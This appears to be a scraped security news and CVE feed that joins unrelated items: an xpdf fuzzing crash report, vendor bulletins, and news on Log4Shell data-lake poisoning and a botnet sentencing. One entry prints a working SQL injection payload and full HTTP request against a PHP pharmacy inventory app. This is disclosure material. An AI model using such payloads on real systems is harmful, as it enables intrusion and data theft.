xpdf 4.04 allocates excessive memory when presented with crafted input. This can be triggered by (for example) sending a crafted PDF document to the pdftoppm binary. It is most easily reproduced with the DCMAKE_CXX_COMPILER=afl-clang-fast++ option.

elvadisas

**Posts:** 6

**Joined:** Mon Apr 25, 2022 11:21 pm

**allocator is out of memory(OOM in pdftoppm)**

Hello,  
i had a crash when i did a fuzzing test in xpdf.  
Description:  
Memory Allocation with Excessive Size Value  
run poc:  
/home/elva/fuzzing\_xpdf/install/bin/pdftoppm ./poc /home/elva/fuzzing\_xpdf/out

asan :  
Syntax Error (8241): Too few (1) args to 'c' operator  
Syntax Error (8252): Too few (4) args to 'c' operator  
Syntax Error (8267): Too few (5) args to 'cm' operator  
Syntax Error (8274): Unknown operator 'rg69122'  
Syntax Error (8274): Unknown operator 'c464.34084'  
Syntax Error (8274): Too few (1) args to 'c' operator  
Syntax Error (8274): Unknown operator 'T'  
Syntax Error (8274): Unknown operator 'T000069127.734.3436812812.3000085.rg'  
Syntax Error (8274): Unknown operator 'T'  
Syntax Error (8274): Arg #0 to 'J' operator is wrong type (real)  
Syntax Error (8277): Too few (2) args to 'c' operator  
Syntax Error (8277): Unknown operator 'c46978425992'  
Syntax Error (8277): Arg #0 to 'Tf' operator is wrong type (real)  
Syntax Error (8277): Unknown operator 'E25992'  
Syntax Error (8277): Too few (1) args to 'c' operator  
Syntax Error (8277): Arg #0 to 'Tf' operator is wrong type (integer)  
Syntax Error (8277): Too few (2) args to 'rg' operator  
Syntax Error (8277): Too few (4) args to 'c' operator  
Syntax Error (8277): Too few (1) args to 'cm' operator  
Syntax Error (8277): Too few (1) args to 'c' operator  
Syntax Error (8293): Unknown operator 'q5685700398103000'  
Syntax Error (8328): Unknown operator 'T252000'  
Syntax Error (8344): Too few (5) args to 'c' operator  
Syntax Error (8355): Too few (1) args to 'c' operator  
Syntax Error (8367): Unknown operator 'T'  
Syntax Error (8397): Too few (1) args to 'c' operator  
Syntax Error (8408): Unknown operator 'BT831'  
Syntax Error (8439): Unknown operator 'm0'  
Syntax Error (8442): Too few (0) args to 'c' operator  
Syntax Error (8456): Unknown operator 'cm1184'  
\=================================================================  
\==486377==ERROR: AddressSanitizer: requested allocation size 0x26bfff68a20 (0x26bfff69a20 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)  
#0 0x4ce7cd in malloc (/home/elva/fuzzing\_xpdf/install/bin/pdftoppm+0x4ce7cd)  
#1 0x7fe487 in gmalloc64(unsigned long) /home/elva/fuzzing\_xpdf/xpdf-4.04/goo/gmem.cc:271:13  
#2 0x7fe487 in gmallocn64(int, unsigned long) /home/elva/fuzzing\_xpdf/xpdf-4.04/goo/gmem.cc:288:10

\==486377==HINT: if you don't care about these errors you may set allocator\_may\_return\_null=1  
SUMMARY: AddressSanitizer: allocation-size-too-big (/home/elva/fuzzing\_xpdf/install/bin/pdftoppm+0x4ce7cd) in malloc  
\==486377==ABORTING

POC is in ATTACHMENT.  
Thank you.

Attachments

poc.rar

(31 KiB) Downloaded 17 times

derekn

**Posts:** 740

**Joined:** Wed Apr 05, 2017 6:57 pm

**Re: allocator is out of memory(OOM in pdftoppm)**

Post by **derekn** » Wed May 11, 2022 10:26 pm

I've tried with gcc 5.5.0 and gcc 11.2.0 (that's what I have on my dev machines), with asan, and I'm still not seeing a crash.

What was your cmake command to configure xpdf before compiling?

elvadisas

**Posts:** 6

**Joined:** Mon Apr 25, 2022 11:21 pm

**Re: allocator is out of memory(OOM in pdftoppm)**

Post by **elvadisas** » Thu May 12, 2022 2:18 am

Hello,derekn

you can reproduced the bug by the following steps:

mkdir build\_asan  
cd build\_asan

cmake -DCMAKE\_BUILD\_TYPE=Debug $HOME/fuzzing\_xpdf/xpdf-4.04 -DCMAKE\_INSTALL\_PREFIX=$HOME/fuzzing\_xpdf/install/ -DCMAKE\_CXX\_COMPILER=afl-clang-fast++

AFL\_USE\_ASAN=1 make  
sudo AFL\_USE\_ASAN=1 make install

$HOME/fuzzing\_xpdf/install/bin/pdftoppm –f 1 $HOME/fuzzing\_xpdf/poc $HOME/fuzzing\_xpdf/output

POC file and more screenshots are in the ATTACHMENTS.

My Testing Enviroments:  
\--Tested on Ubuntu 20.04.2 LTS x86\_64,AFL++  
\--gcc version 9.3.0  
\--xpdf version xpdf 4.04  
https://dl.xpdfreader.com/xpdf-4.04.tar.gz

you can try it:-)

Attachments

screenshot.rar

(76.09 KiB) Downloaded 8 times

poc.rar

(31 KiB) Downloaded 10 times

CVE-2022-30775: allocator is out of memory(OOM in pdftoppm)

1.  Releases
2.  v1.22.0

Compare

Choose a tag to compare

Latest

Latest

 github-actions released this

· 1 commit to master since this release

v1.22.0

5b2a402

Compare

Choose a tag to compare

*   Prohibit negative size argument to table/new.
*   Add module/value.
*   Remove file/popen. Use os/spawn with the :pipe options instead.
*   Fix bug in peg thru and to combinators.
*   Fix printing issue in doc macro.
*   Numerous updates to function docstrings
*   Add defdyn aliases for various dynamic bindings used in core.
*   Install janet.h symlink to make Janet native libraries and applications  
    easier to build without jpm.

**Assets**8

*   janet-1.22.0-windows-x64-installer.msi
    
    1.63 MB
    
*   janet-v1.22.0-linux-x64.tar.gz
    
    1.26 MB
    
*   janet-v1.22.0-macos-x64.tar.gz
    
    1.35 MB
    
*   janet.c
    
    2.22 MB
    
*   janet.h
    
    79.6 KB
    
*   shell.c
    
    31 KB
    
*   Source code (zip)
    
*   Source code (tar.gz)
    

2 people reacted

0 Join discussion

CVE-2022-30763: Release Janet 1.22.0 · janet-lang/janet

Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.

CVE-2022-30708: Webmin

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 6 and May 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for May 6 to May 13

IBM WebSphere Application Server Liberty 17.0.0.3 through 22.0.0.5 , with the adminCenter-1.0 feature configured, could allow an authenticated user to issue a request to obtain the status of HTTP/HTTPS ports which are accessible by the application server. IBM X-Force ID: 222078.

**Security Bulletin**

  

**Summary**

IBM WebSphere Application Server Liberty is vulnerable to an information disclosure with the adminCenter-1.0 feature enabled. This has been addressed.

**Vulnerability Details**

**CVEID:**   CVE-2022-22393  
**DESCRIPTION:**   IBM WebSphere Application Server Liberty, with the adminCenter-1.0 feature configured, could allow an authenticated user to issue a request to obtain the status of HTTP/HTTPS ports which are accessible by the application server.  
CVSS Base score: 3.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222078 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM WebSphere Application Server Liberty

17.0.0.3-22.0.0.5

**Remediation/Fixes**

IBM strongly recommends addressing the vulnerability now by applying a currently available interim fix or fix pack that contains the APAR PH45086. To determine if a feature is enabled for IBM WebSphere Application Server Liberty, refer to How to determine if Liberty is using a specific feature. 

**For IBM WebSphere Application Server Liberty 17.0.0.3 - 22.0.0.5 using the adminCenter-1.0 feature:**   
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PH45086  
\--OR--  
· Apply Liberty Fix Pack 22.0.0.6 or later (targeted availability 2Q2022).

Additional interim fixes may be available and linked off the interim fix download page.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

12 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSEQTP","label":"WebSphere Application Server"},"Component":"Liberty","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF010","label":"HP-UX"},{"code":"PF012","label":"IBM i"},{"code":"PF016","label":"Linux"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"},{"code":"PF035","label":"z\\/OS"},{"code":"PF017","label":"Mac OS"}\],"Version":"Liberty","Edition":"Liberty","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-22393: Security Bulletin: IBM WebSphere Application Server Liberty is vulnerable to an Information Disclosure (CVE-2022-22393)

Indian tech policy expert Samir Saran says it’s not too late to ‘course-correct’ after a ‘challenging decade’ for liberal democracies

Indian tech policy expert Samir Saran says it’s not too late to ‘course-correct’ after a ‘challenging decade’ for liberal democracies

The internet is not currently, as its earliest advocates foresaw, “a great liberator of human expression and catalyst for pluralism and democratic thought”, reflects tech and geopolitics expert Samir Saran.

Quite the opposite.

Delivering a keynote on day one of Black Hat Asia 2022 yesterday (May 12), Saran urged governments to course-correct on regulating the online world after a challenging decade for liberal democracies.

Saran, president of Indian think tank the Observer Research Foundation (ORF), said countries like India are caught between the corrosive digital ecosystem built by Silicon Valley’s tech giants and an even more damaging alternative constructed by China.

While the US model champions openness and (relative) freedom of expression, China lures countries into its technological orbit with the promise of low prices, external investment, and an apparatus of control and surveillance.

**Crises of trust and legitimacy**

However, the US system falls short of its purported ideals because unaccountable corporate executives dictate “who is heard, who is censored” in the digital town square, said Saran.

Social media has facilitated the spread of misinformation and hate speech, he added.

But despite suffering crises of trust and legitimacy, online services have become so critical to our lives that we’re obliged to use them anyway.

Read more of the latest social media security news and analysis

Furthermore, Saran asserted, tech giants present themselves in alternate guises to suit the situation – as a public utility to protect themselves against private legal action, or as a private entity when they need to discourage government interference.

Thankfully, many governments are beginning to wake up to the threat, said Saran. “From Canberra to New Delhi and the EU, governments are trying to find ways to curtail the power of social media platforms.”

However, “the transnational nature of big tech and the velocity of information makes it difficult to regulate”, he acknowledged.

**Divide and conquer**

The Chinese ecosystem is unaccountable at an entirely different level, said Saran, with de facto decision-makers in the Chinese Communist Party unreachable behind the Great firewall.

The business model “is to divide democracies – from within and outside”, said Saran.

The government, which runs the internet through corporations like Alibaba, conducts influence operations with the help of AI, deep fakes, and troll armies in service of this goal.

The speaker concluded that “if democracy is to survive, technology will have to be tamed” – but how?

“We need accountable boardrooms – perhaps even elected ones – so they are accountable to the communities they serve,” was one suggestion.

Another desirable pillar would be transnational agreements that respect diversity and cultural contexts.

“One size must not fit all,” Saran explained. “Facebook in India needs a different texture to the US. Twitter must be sensitised to preferences of \[the\] Japanese.”

Lastly, according to Saran, there ought to be a ‘reciprocity’ principle applied in relation to authoritarian adversaries. Why should we allow state-backed mischief-makers access to our platforms when we are denied access to theirs, he pondered?

RECOMMENDED CyberUK 2022: Global power conflicts creating ‘balkinization’ of cybersecurity tech

Black Hat Asia:&nbsp;‘If democracy is to survive, technology will have to be tamed’

Pharmacy Sales And Inventory System v1.0 is vulnerable to SQL Injection via /pharmacy-sales-and-inventory-system/manage_user.php?id=.

Permalink

**Pharmacy Sales And Inventory System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14500/pharmacy-sales-and-inventory-system-using-phpmysql-source-code.html

Vulnerability File: /pharmacy-sales-and-inventory-system/manage\_user.php?id=

Vulnerability location: ip/pharmacy-sales-and-inventory-system/manage\_user.php?id=, id

\[+\] Payload: /pharmacy-sales-and-inventory-system/manage\_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP\_CONCAT(database()),NULL,NULL,NULL-- // Leak place ---> id

GET /pharmacy\-sales\-and\-inventory\-system/manage\_user.php?id\=\-1+UNION+ALL+SELECT+NULL,GROUP\_CONCAT(database()),NULL,NULL,NULL\-- HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=4k3d5u023qn0eacroobson4prq
Connection: close

CVE-2022-30407: bug_report/SQLi-1.md at main · k0xx11/bug_report

A brand-new attack vector lays open enterprise data lakes, threatening grave consequences for AI use cases like telesurgery or autonomous cars.

Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning — but unfortunately, these are vulnerable to exploitation via the Java Log4Shell vulnerability, researchers have found.

Generally, organizations are focused on ingesting as many data points for training an AI or algorithm that they can, with an eye toward privacy — but all too often, they're skipping over hardening the security of the data lakes themselves.

According to research from Zectonal, the Log4Shell bug can be triggered once it is ingested into a target data lake or data repository via a data pipeline, bypassing conventional safeguards, such as application firewalls and traditional scanning devices.

As with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text. An attacker could simply embed the string within a malicious big-data file payload to open up a shell inside the data lake, and from there can initiate a data-poisoning attack, researchers say. And, since the big-data file carrying the poison payload is often encrypted or compressed, the difficulty of detection is much greater.

“The simplicity of the Log4jShell exploit is what makes it so nefarious,” says David Hirko, founder at Zectonal. “This particular attack vector is difficult to monitor and identify as a threat due to the fact that it blends in with normal operations of data pipelines, big-data distributed systems, and machine-learning training algorithms."

**Leveraging RCE Exploits to Access Data Lakes  
**One of the ways to accomplish this attack is by targeting vulnerable versions of the no-code, open source extract-transform-load (ETL) software application — one of the most popular tools for populating data lakes. An attacker could access the ETL service running in a private subnet from the public Internet via a known remote code execution (RCE) exploit, researchers explain in the report.

The Zectonal team put together a working proof-of-concept (PoC) exploit that used this vector, successfully gaining remote access to subnet IP addresses that were part of a virtual private cloud hosted by a public cloud provider.

While ETL patched the RCE issue last year, the components have been downloaded millions of times, and it appears that security teams have lagged in applying the fix. The Zectonal team was successful in "triggering an RCE exploit for multiple unpatched releases of the ETL software that spanned a two-year period," according to the report, shared with Dark Reading prior to publication.

"This attack vector isn't as simple as just kind of sending a text string to a Web server," Hirko says, noting the need to penetrate the data supply chain. "An attacker needs to compromise a file somewhere upstream and then have it be flowed into the target data lake. Say you were considering weather data — you might be able to manipulate a file from a weather sensor so that it contained this particular string."

This particular exploit and vulnerability has patches available, but there are likely many different avenues to achieving this kind of Log4Shell attack.

"There are probably many, many previously unknown or undisclosed vulnerabilities that allow the same thing," Hirko says. "This is one of the first data poisoning-specific attack vectors that we've seen, but we believe that data poisoning as a subset of AI poisoning is going to be one of the new attack vectors of the future."

**Real-World Consequences  
**So far, Zectonal hasn't seen such attacks in the wild, but researchers hope the threat is on security teams' radar screens. Such attacks may be rare, but they can have outsized consequences. For instance, consider the case of autonomous vehicles, which rely on AI and sensors to navigate city streets.

"Automakers are training their AI to look at stoplights, to know when to stop, slow down, or go in the classic red, yellow, green format," Hirko explains. "If you were to start poisoning your data lake that was training your AI, it's possible to manipulate the AI software to behave in unforeseen ways. Perhaps your car unintentionally gets trained to go when the traffic light turns red and stop when it turns green. So, that's the type of attack vector that we suspect we'll be seeing in the future."

**Security Protections Lag  
**The risks are gaining a higher profile among practitioners, Hirko tells Dark Reading — many of whom understand the danger but are at a loss for how to tackle it. Among the challenges is the fact that approaching the problem requires a new way of implementing security, as well as new tools.

"We were able to send the poisoned payload through a pretty common data pipeline," Hirko says. "Traditionally, these kinds of files and data pipelines don't come through your standard front-door set of firewalls. How data comes into the enterprise, how data comes into the data lake, hasn't really been part of the classic security posture of defense in depth or zero trust. If you're using any of the major cloud providers, data that comes in from an object storage bucket won't necessarily come through that firewall."

He adds that the file formats that these types of attacks can be bundled into are relatively new and somewhat obscure — and because they're specific to the big data and AI world, they're not as easy to scan with typical security tools, which are made to scan documents or spreadsheets.

Thus, for their part, security vendors need to focus on the development of different types of products to gain that further visibility, he notes.

"Companies are looking at the quality of the data, components, individual data points — and it just makes sense to look at the security vulnerability of that data as well," Hirko says. "We suspect that data observability will be built into quality assurance as well as data security. This is an emerging kind of data and AI security domain."

Log4Shell Exploit Threatens Enterprise Data Lakes, AI Poisoning

Botnet operator had thousands of hacked credential listings, according to the DoJ

Botnet operator had thousands of hacked credential listings, according to the DoJ

A Ukrainian hacker has been sentenced to four years behind bars for selling stolen credentials online.

On Thursday (May 12), the US Department of Justice (DoJ) said that Glib Oleksandr Ivanov-Tolpintsev, from Chernivtsi, Ukraine, was sentenced to time in federal prison for operating a botnet designed to brute-force attack servers.

**DON’T MISS** Marcus Hutchins on halting WannaCry – ‘Still to this day it feels like it was all a weird dream’

Botnets are slave networks made up of compromised computers and other devices. Operators can direct these networks to slam online services with traffic, known as distributed denial-of-service (DDoS) attacks.

Furthermore, botnets can be commanded to attempt to crack credentials by automatically applying trial-and-error username and password combinations.

**Rogue operation**

According to the DoJ filing, Ivanov-Tolpintsev’s botnet was used to “decrypt numerous computer login credentials simultaneously”. At its peak, roughly 2,000 machines were targeted and compromised each week.

From 2017 to 2019, the cyber-attacker operated a store on the dark web and sold hacked credentials in their thousands. Businesses in Florida owned at least 100 servers listed by the 28-year-old.

Read about more of the latest cyber-attacks

The scheme was profitable – at least, until he was caught – and prosecutors estimate that the dark web store turned over a minimum of $82,648.

Ivanov-Tolpintsev was tracked to Korczowa, Poland, and was arrested by local law enforcement on October 3, 2020. He was then extradited to the US and pleaded guilty to conspiring to traffic in unauthorized access devices and computer passwords.

As part of his sentence, Ivanov-Tolpintsev must also forfeit his cybercrime proceeds.

The case was investigated by the IRS and the Tampa Division of the FBI.

**YOU MIGHT ALSO LIKE** Researcher stops REvil ransomware in its tracks with DLL-hijacking exploit

Tag

#mac